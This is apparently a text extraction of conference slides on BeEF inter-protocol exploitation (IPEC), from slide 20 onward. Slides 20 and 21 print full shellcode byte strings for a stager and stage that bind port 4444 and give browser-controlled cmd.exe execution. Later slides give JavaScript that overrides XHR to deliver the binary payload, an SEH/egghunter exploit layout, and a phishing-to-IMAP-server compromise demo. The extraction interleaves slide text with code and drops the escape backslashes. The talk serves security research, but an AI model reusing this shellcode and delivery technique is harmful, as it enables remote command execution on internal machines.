    Revitalizing IPEC Inter-Protocol Exploitation:solution 5 • Limitations: Not anymore, thanks to the BeEF Bind shellcode. • SOP and cross-domain restrictions You have a bind shellcode which can be • PortBanning totally controlled through an hooked browser sitting in the same victim • HTTP Headers size internal network. • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells?
  • 20.
    BeEF Bind shellcode howit works • Ty created a new staging shellcode, which we called var stager = "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" + BeEF Bind "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" + "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" + "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" + "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" + • He was bored of reverse shells :D "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" + "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" + "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" + "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" + • stager -> 299 bytes (326 after bad-char encoding) "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" + "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" + "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" + • "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" + stage -> 792 bytes "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" + "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" + "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" + • "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" + The stager sets up a bind port on 4444/TCP to accept "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" + "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" + an HTTP POST request containing the raw stage in a "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" + "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" + parameter called ‘cmd’. "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" + "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" + 20 "x37x96x26x84";
  • 21.
    BeEF Bind shellcode var stage_allow_origin = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28" how it works "x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" + "x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" + "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" + "xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" + "x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" + "x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" + "x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" + • "xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" + The stage sets up a bind port on 4444/TCP to accept "xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" + "x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" + HTTP POST requests from the web browser. "x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" + "x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" + "x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" + "x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" + • Set of pipes to redirect the cmd.exe input and output. "xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" + "xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" + "x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" + This allows to jump in the middle of the HTTP request "x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" + "x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" + and the cmd.exe process to implement the web server "x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" + "xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" + style functionality. "x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" + "xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" + "xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" + "xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" + • The command result output is returned with the "x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" + "x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" + "x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" + Access-Control-Allow-Origin: * header. After the stage "x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" + "x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" + is deployed, SOP is not a problem anymore. "x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" + "x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" + "x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" + "x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" + 21 "xfexffxff";
  • 22.
    BeEF Bind shellcode howit works The shellcode is also available as a Metasploit module BeEF Bind MSF Payload Module 22
  • 23.
    BeEF Bind shellcode howit works Burp/OllyDbg DEMO 23
  • 24.
    BeEF Bind shellcode delivery and usage from within BeEF • Shellcode is binary data • Stager and Stage are delivered with XMLHttpRequest.sendAsBinary • For Webkit browsers that don’t support Stager - Stage sendAsBinary, prototype overriding on XHR object. XMLHttpRequest.prototype.sendAsBinary = function(datastr) { function byteValue(x) { return x.charCodeAt(0) & 0xff; } var ords = Array.prototype.map.call(datastr, byteValue); var ui8a = new Uint8Array(ords); this.send(ui8a.buffer); }
  • 25.
    BeEF Bind shellcode deliveryand usage from within BeEF • We cannot know in advance the exact size of HTTP headers. • A dummy cross-domain XHR request is sent back to BeEF, exact size of headers is calculated, and exploit junk is adjusted accordingly. • Like in all exploits, 1 byte error is enough to have a not-working exploit. • With this approach, errors are minimized.
  • 26.
    BeEF Bind shellcode delivery and usage from within BeEF • Typical SEH exploit with EggHunter, non-IPEC: • commands + junk + shellcode + next_seh + seh + egg_hunter • Typical SEH exploit with EggHunter, IPEC: • HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter
  • 27.
    BeEF Bind shellcode deliveryand usage from within BeEF Immunity dbg view: IMAP process memory when sending the stager
  • 28.
    BeEF Bind shellcode deliveryand usage from within BeEF Wireshark view: stager delivery Wireshark view: command delivery and results
  • 29.
    BeEF Bind shellcode deliveryand usage from within BeEF set target exec command Ultimate fun. BeEF IPEC shell (JS) get results 29
  • 30.
    High Level Architecture fromFF extension to command execution
  • 31.
    High Level Architecture fromFF extension to command execution
  • 32.
    High Level Architecture fromFF extension to command execution
  • 33.
    High Level Architecture fromFF extension to command execution
  • 34.
    High Level Architecture fromFF extension to command execution
  • 35.
    Demo fun from phishingto internal IMAP server compromise
  • 36.
    Thanks • Wade and the other BeEF guys • Ty for his awesome shellcode • Michele for his awesome BeEF integration • RuxCon crew and you, attendees • Whoever will offer beers later...
  • 37.